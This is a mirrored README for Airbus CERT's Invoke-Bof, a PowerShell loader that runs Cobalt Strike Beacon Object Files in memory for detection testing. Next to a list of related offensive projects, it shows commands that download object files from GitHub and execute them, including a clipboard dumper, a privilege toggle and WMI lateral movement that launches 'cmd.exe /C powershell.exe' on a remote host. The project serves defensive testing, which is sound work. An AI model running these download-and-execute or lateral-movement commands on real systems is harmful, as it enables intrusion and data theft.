GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → airbus-cert → Invoke-Bof

airbus-cert / Invoke-Bof

Licence: Apache-2.0 license
Load any Beacon Object File using Powershell!

Programming Languages

powershell
5483 projects
c
50402 projects - #5 most used programming language
Makefile
30231 projects

Labels

cobalt-strike

Projects that are alternatives of or similar to Invoke-Bof

Malleable-C2-Profiles
Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.
Stars: ✭ 168 (-23.98%)
Mutual labels:  cobalt-strike
nanodump
The swiss army knife of LSASS dumping
Stars: ✭ 1,121 (+407.24%)
Mutual labels:  cobalt-strike
conti-pentester-guide-leak
Leaked pentesting manuals given to Conti ransomware crooks
Stars: ✭ 772 (+249.32%)
Mutual labels:  cobalt-strike
Awesome Red Teaming
List of Awesome Red Teaming Resources
Stars: ✭ 4,223 (+1810.86%)
Mutual labels:  cobalt-strike
Penetration testing poc
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1645.7%)
Mutual labels:  cobalt-strike
Red Team Infrastructure Wiki
Wiki to collect Red Team infrastructure hardening resources
Stars: ✭ 2,981 (+1248.87%)
Mutual labels:  cobalt-strike
MalleableC2Profiles
Malleable C2 profiles for Cobalt Strike
Stars: ✭ 57 (-74.21%)
Mutual labels:  cobalt-strike
cobalt-strike-persistence
cobalt strike 自启动脚本
Stars: ✭ 40 (-81.9%)
Mutual labels:  cobalt-strike
AggressorScripts
A collection of Cobalt Strike aggressor scripts
Stars: ✭ 18 (-91.86%)
Mutual labels:  cobalt-strike
CobaltStrike Script Wechat Push
CobatStrike-Script, Beacon上线,微信实时推送!
Stars: ✭ 41 (-81.45%)
Mutual labels:  cobalt-strike
Phant0m
Windows Event Log Killer
Stars: ✭ 1,423 (+543.89%)
Mutual labels:  cobalt-strike
MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+75.57%)
Mutual labels:  cobalt-strike
InMemoryNET
Exploring in-memory execution of .NET
Stars: ✭ 55 (-75.11%)
Mutual labels:  cobalt-strike
chkdfront
Check Domain Fronting (chkdfront) - It checks if your domain fronting is working
Stars: ✭ 42 (-81%)
Mutual labels:  cobalt-strike

Invoke-Bof

Load any Beacon Object File using Powershell!

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14

██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]

[+] Mapping of .text    at  0x19924310000
[+] Mapping of .rdata   at  0x19924320000
[+] Mapping of .xdata   at  0x19924330000
[+] Mapping of .pdata   at  0x19924540000
[+] Mapping of /4       at  0x19924550000
[+] Jump into beacon at 0x19924310000
****************************************************************************
Test Beacon for Invoke-Bof
Argument 1 : toto
Argument 2 : 14

=============================== Beacon Output ==============================
00000000   66 6F 6F 00 6F 00 00 00 62 61 72 20 32 32 32 33  foo.o...bar 2223
00000010   33 33                                            33              
============================================================================
[+] Clipboard updated !
[!] Active Windows : Windows PowerShell ISE
[!] Content : $BOFBytes = [IO.File]::ReadAllBytes($Path)
****************************************************************************

CobaltStrike appears to be the favoured offensive framework, used by a large majority of the offensive side of cybersecurity.

The framework is very extensible and allows Red Teamers to develop specific offensive modules named BOF, short for Beacon Object File. Beacons are what CobaltStrike calls their agents, or final payloads.

A Beacon Object File is split into two parts:

  • A payload that will be executed on the victim machine
  • An aggressor script, which will prepare and interact with the payload

Many Red Teams publish BOFs on their public GitHub repositories, implementing lateral movement, vulnerability, attack, or persistence. Instead of reimplementing these techniques each time we want to try and detect them, We decided to find a way to execute them directly.

Get-Help Invoke-Bof

Parameter help
BOFBytes A byte array containing the beacon object file to load and execute. Loading a BOF from a local file :
$BOFBytes = [IO.File]::ReadAllBytes("c:\my_bof.o")
A BOF hosted on a repository :
$BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
EntryPoint Name of the function to call (the convention is to name the entry point go)
ArgumentList List of all arguments that will be passed to the main function. For example marshall two arguments, the first as string, the second as integer :
Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14
To know the parameters accepted by a BOF, please take a look at the aggressor script.
UnicodeStringParameter Marshal all string parameters as UTF-16LE strings

Example :

$BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14

How does it works?

✈️ If you want to know what is behind the scene, please read the dedicated blog post !!! ✈️

Launch Every Beacon Carefully!

Now we can launch every beacon available from Github. For example, we can test a beacon that dumps our clipboard:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/DallasFR/BOF_dumpclip/raw/main/dump.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go



██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text    at  0x133e0c20000
[+] Mapping of .rdata   at  0x133e0c30000
[+] Mapping of .xdata   at  0x133e0c40000
[+] Mapping of .pdata   at  0x133e0c50000
[+] Mapping of /4       at  0x133e0c60000
[+] Jump into beacon at 0x133e0c20000
****************************************************************************
[+] Clipboard updated !
[!]Active Windows : Windows PowerShell ISE
[!] Content : $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/DallasFR/BOF_dumpclip/raw/main/dump.o").Content
Invoke-Bof -BOFBytes $BOFBytes  -EntryPoint go
----------------------------------

****************************************************************************

We can try to detect an attacker that tries to enable SE_DEBUG privilege:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/EspressoCake/Toggle_Token_Privileges_BOF/raw/main/dist/toggle_privileges_bof.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint enable -ArgumentList 20



██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text    at  0x133e0ab0000
[+] Mapping of .data    at  0x133e0bf0000
[+] Mapping of .xdata   at  0x133e0c20000
[+] Mapping of .pdata   at  0x133e0c30000
[+] Mapping of .rdata   at  0x133e0c40000
[+] Mapping of /4       at  0x133e0c50000
[+] Jump into beacon at 0x133e0ab0c10
****************************************************************************
Authors:
	@the_bit_diddler
	@hackersoup

You are not currently in an administrative session. Come again later!

****************************************************************************

You want to execute a process using WMI create process:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/Yaxser/CobaltStrike-BOF/raw/master/WMI%20Lateral%20Movement/ProcCreate.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "\\COMPUTER\ROOT\CIMV2","domain","username","username","cmd.exe /C powershell.exe",1 -UnicodeStringParameter


██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝

  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text at  0x2e940940000
[+] Mapping of /4 at  0x2e95a880000
[+] Mapping of /30 at  0x2e95a890000
[+] Mapping of /57 at  0x2e95a8f0000
[+] Mapping of /84 at  0x2e95a900000
[+] Mapping of /110 at  0x2e95b160000
[+] Mapping of /137 at  0x2e95b170000
[+] Mapping of /164 at  0x2e95b180000
[+] Mapping of /193 at  0x2e95b190000
[+] Mapping of /223 at  0x2e95b1a0000
[+] Mapping of .xdata at  0x2e95b1b0000
[+] Mapping of .pdata at  0x2e95b1c0000
[+] Mapping of .rdata at  0x2e95b1d0000
[+] Mapping of /253 at  0x2e95b1e0000
[+] Mapping of /277 at  0x2e95b1f0000
[+] Mapping of /301 at  0x2e95b200000
[+] Mapping of /325 at  0x2e95b230000
[!] Unable to parse API name :  _ZTV10_com_error  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_error4DtorEv  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD1Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  __imp_LocalFree  /!\ continue without resolving /!\
[!] Unable to parse API name :  _Unwind_Resume  /!\ continue without resolving /!\
[!] Unable to parse API name :  __cxa_call_unexpected  /!\ continue without resolving /!\
[!] Unable to parse API name :  __gxx_personality_seh0  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTI10_com_error  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD1Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD0Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTVN10__cxxabiv117__class_type_infoE  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTS10_com_error  /!\ continue without resolving /!\
[+] Jump into beacon at 0x2e940940181
****************************************************************************
ExecMethod Succeeded!
****************************************************************************
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].